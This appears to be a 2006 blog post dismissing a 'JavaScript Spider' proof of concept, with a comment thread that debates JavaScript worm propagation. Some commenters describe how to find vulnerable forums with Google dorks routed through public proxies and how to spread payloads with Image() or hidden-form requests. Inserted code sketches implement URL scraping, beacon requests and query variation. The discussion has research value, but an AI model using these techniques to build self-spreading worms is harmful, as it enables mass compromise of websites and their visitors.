I came across a site today that claimed to present a “new JavaScript attack vector” called the JavaScript Spider. The result, however, is completely laughable. According to the web site:
The JavaScript Spider is the first implementation of a proof of concept tool which shows that Javascript can be in fact quite dangerous. This implementation depends on proxydrop.com but other proxies are possible as well: Google Translate is one of them. Keep in mind that the tool spiders only the first level.
I don’t think this guy knows what “attack vector” means. Using a publicly-accessible anonymous proxy is hardly a security concern – especially considering that none of the user’s personal information is being passed along.
Honestly, the only thing that he “discovered” (and that was just something that he noticed, as the world has passed him by) is that publicly-accessible anonymous proxies can be used for “bad” things. Uhhh… duh?
Seriously, if every use of a server-side proxy was considered to be a client-side security risk, then we’d have a much larger issue on our hands. This quote, alone, helps to sum up his ignorance: “Javascript can be in fact quite dangerous.”
Cheston (October 8, 2006 at 5:44 pm)
I think I remember seeing this article on digg a few days ago, I read the first few sentences, saw his use of the term “attack vector”, and that kind of tipped me off that the whole thing was bs, so I just cried silently. I sometimes question why I read digg. =(
maluc (October 9, 2006 at 2:45 am)
You seem to know how to program in javascript.. but clearly do not understand the sandbox security model known as the Same Origin Policy, or the security implications of working around it.
So allow me to shed some light on the largely unexplored field of javascript worms. These are worms which propagate using client-side javascript, executed any time someone visits an infected page. The biggest hurdle in propagation is finding new targets.. which can be accomplished in one of four ways:
1.) Random IP dialing
2.) Browser Exploit
3.) Control Server
4.) Public Services
As I said, this field is largely unexplored, but these are the most common. Method 1 is very inefficient, unless it’s some global webserver exploit like one affecting Apache servers. Javascript worms, however, are mostly useful for propagating via exploits in web applications – like an SQL/XSS vulnerability in phpBB, for example. Browser exploits are uncommon, browser- and version-dependent, and if they let you bypass the same-origin sandbox, they usually also allow remote code execution. In that case, you might as well infect the computer and run an executable that propagates. That requires both a browser and a webserver exploit, which is ideal but hard to come by.
And then there are Methods 3 and 4. Three is the usual way: set up a Control Server to act as the worm’s head, locate potentially vulnerable servers with it, and pass their locations to the client, which exploits them for you. The problem is this gives the worm a head, and when the head’s chopped off the worm dies. Also, for a large worm, you need a server that can handle such a huge load.
This is where pdp’s work with public services shows destructive potential. It’s still not a headless worm, but utilizing a server like google to search for vulnerable services .. http://www.gnucitizen.org/blog/google-search-api-worms .. allows a worm of any size/load. Google has been used for years to do this – in PHP, Perl, asp, c++, java, flash, etc – but until recently it’s been thought impossible to use javascript for it. That gives XSS and SQL vulnerabilities a very dangerous weapon. The javascript spider expands this to other common services like proxies.
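The target-discovery step described above can be sketched in plain javascript: fetch a search-results page through a public proxy (to dodge the Same Origin Policy), then scrape candidate URLs out of the returned HTML. This is only a hedged illustration – the proxy URL scheme, parameter names, and the regex are assumptions, not the actual spider’s code.

```javascript
// Hypothetical sketch of the target-discovery step: query a search
// service via a public proxy and harvest URLs from the result HTML.
// The proxy scheme here is invented for illustration.

// Build the proxied search URL (proxy host and param are hypothetical).
function buildSearchUrl(proxyBase, query) {
  return proxyBase + '?q=' + encodeURIComponent(query);
}

// Pull href targets out of a blob of result HTML with a crude regex.
function parseResultLinks(html) {
  var links = [];
  var re = /href="(https?:\/\/[^"]+)"/g;
  var m;
  while ((m = re.exec(html)) !== null) {
    links.push(m[1]);
  }
  return links;
}

// In a browser, a worm would fetch buildSearchUrl(...) with
// XMLHttpRequest (same-origin, since the proxy serves the page)
// and feed responseText to parseResultLinks().
```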
It adds an extra level of danger to persistent XSS and SQL injections. Hopefully this isn’t all too difficult for you to grasp.. i tried to explain it as simply as possible. If it is, stick to the del.icio.us widgets and leave web app security to brighter minds.
-maluc
Jonathan Snook (October 10, 2006 at 9:30 am)
By “attack vector”, I think he means “attack direction”. In other words, it’s an avenue in which an attack could be mounted.
There are two things here: replication and propagation.
The concept for replication is to use Google to find vulnerable sites based on known security issues, most likely through an SQL injection attack. Propagation relies on vulnerable sites having the ability to embed javascript payloads AND having those payloads accessible to other site visitors so that the replication process can begin again.
The biggest problem is that the replication process is likely relying on the same subset of results, and the worm doesn’t necessarily know which sites are vulnerable and which have already been hit. Looking (very quickly) at the Google AJAX Search API, for example, reveals that the result set is small (8 results max) with no ability to offset or page through additional results. This would have your worm hit a wall very quickly. You’d also almost certainly have to mount the attack via POST requests, since a JS payload required to do replication could exceed the limits of a GET request.
I suppose I’d put it this way: Yes, it’s possible, but it seems a terribly inefficient approach unless you A) find an uncommon security hole that’s unlikely to be fixed and B) have a way to replicate it quickly and easily.
maluc (October 10, 2006 at 6:43 pm)
Yes, i’ve heard the same claim that GET requests are limited to 100 characters per input.. although when testing i’m still able to use more than 100. Either way, making POST requests is not any tougher (i used Image() for simplicity). The result can look something like:
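[The snippet maluc posted is missing from the page. A hypothetical reconstruction of the Image() technique he mentions might look like the following – the URL, parameter names, and helper are illustrative only, not his original code.]

```javascript
// Hypothetical reconstruction of the missing snippet. A GET request can
// be fired silently by assigning a URL to an Image(); a POST needs a
// hidden form instead. All names and endpoints here are made up.

// Serialize params into a query string for an Image() beacon.
function buildBeaconUrl(base, params) {
  var parts = [];
  for (var key in params) {
    parts.push(encodeURIComponent(key) + '=' + encodeURIComponent(params[key]));
  }
  return base + '?' + parts.join('&');
}

// In a browser:
//   new Image().src = buildBeaconUrl('http://victim.example/post.php',
//                                    {subject: 'hi', body: payload});
// For a POST, create a <form method="post"> with hidden inputs holding
// the same params, append it to document.body, and call form.submit().
```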
And yes, you’re right that google’s API only returns the first 8 results – yahoo the first 10. Writing such worms is not as simple as i spelled out. However, a bit of creativity solves that. Try googling these:
“powered by invision” “we have 7 registered”
“powered by invision” “we have 6 registered”
Both will give you a different subset of 8 URLs. And the nice thing about using proxies to do so is that it can use the normal google search: http://www.proxydrop.com/index.php?__script_get_form=aHR0cDovL3d3dy5nb29nbGUuY29tL3NlYXJjaA%253D%253D&hl=en&q=%22powered+by+invision%22&btnG=Google+Search .. returning all results. Searching with searchmash, however, returns the results in an easier-to-parse form.
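The query-variation trick above can be sketched as a small generator: each slightly different query pulls back a different 8-result subset from the API, so the worm tacks a varying phrase onto a fixed fingerprint. The fingerprint and the “we have N registered” template are just the examples from this thread; real variation logic would be more creative.

```javascript
// Sketch of the query-variation trick: append a changing phrase to a
// fixed fingerprint so each query returns a different result subset.
// The "we have N registered" template is taken from the thread's example.
function buildQueryVariants(fingerprint, maxUsers) {
  var queries = [];
  for (var n = 1; n <= maxUsers; n++) {
    queries.push(fingerprint + ' "we have ' + n + ' registered"');
  }
  return queries;
}
```

For instance, `buildQueryVariants('"powered by invision"', 2)` yields the two example searches quoted above.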
It’s indeed less efficient – worms are inherently so. But it taps the resources of thousands of users, instead of just one, and is thus muchhh more virulent. A.) should be a security hole in a common* web app.. and whether it’s fixed soon or not, the damage is already done to all locatable vulnerable sites.
-maluc
pdp (October 10, 2006 at 8:23 pm)
you can use random words from the current resource to expand the result set provided by google. For example:
“powered by invision” “bla bla”
“powered by invision” inurl:php
“bla bla bla bla” “powered by invision”
will give you 24 (probably different) results in total. The worm doesn’t need to carry a dictionary, but can use the word set that is available.
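The idea above – harvesting random words from the infected page instead of carrying a dictionary – can be sketched like this. The 4-letter word threshold and the helper names are assumptions for illustration.

```javascript
// Sketch of the dictionary-free expansion idea: pull words out of the
// page the worm currently infects and append them to a base query,
// widening the 8-result window. Thresholds here are assumptions.

// Extract candidate words (4+ letters) from the current page's text.
function extractWords(text) {
  return text.toLowerCase().match(/[a-z]{4,}/g) || [];
}

// Pair the base query with each word to make distinct searches.
function expandQueries(base, words, limit) {
  var queries = [];
  for (var i = 0; i < words.length && i < limit; i++) {
    queries.push(base + ' "' + words[i] + '"');
  }
  return queries;
}

// In a browser, the text would come from document.body.innerText
// (or similar), so the word set varies from page to page.
```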
These types of worms are highly efficient!!! Look at Yamanner and Samy.
maluc (October 10, 2006 at 8:52 pm)
i think he was referring to the efficiency of cross-domain javascript worms at locating unique targets. Obviously the example i gave wasn’t very efficient, as each user starts at the same 8 URLs.. it was only meant to explain things as simply as possible. There are a lot of ways to write highly efficient targeting scripts, but there’s no need to go into such detail.
-maluc
Jordan Sissel (October 20, 2006 at 2:51 am)
maluc – I still fail to see why this is a javascript problem. You could just as easily crack (using your example) Invision and put up a flash app that does exactly what the javascript does. It, too, can easily be self-propagating. Same with java. Heck, you could even do it with plain html and a META REFRESH tag. Trim that back to HTTP and you can use a generic 302 REDIRECT if you break the PHP or response codes.
Javascript is not special here.
Jordan Sissel (October 20, 2006 at 3:03 am)
I agree that you can use things like translate.google.com to get around javascript’s same-origin restrictions. However, this capability is not new, so why should it be so shocking?
However, consider the Invision example. If it doesn’t have a “proxy” that passes pages, then you can’t really do anything.
If you have a proxy:
http://www.foo.com/hurray?url=www.mybb.com
and /hurray just fetches the url and passes its contents to the user – none of the user’s cookies will be used, since you’re on http://www.foo.com instead of http://www.mybb.com. So even if the user *does* log in, you’ll have to do some crazy cookie and html mangling to get this to work.
am I wrong?
[email protected] (October 28, 2007 at 6:12 am)
John, before you call GNUCitizen morons STFU.
These guys are some of the most respected researchers in the webappsec field, and that “Javascript Spider” that you find hilarious was a very interesting piece of research on their part.
So STFU, and get a job cleaning dishes somewhere as the security field has no place for you.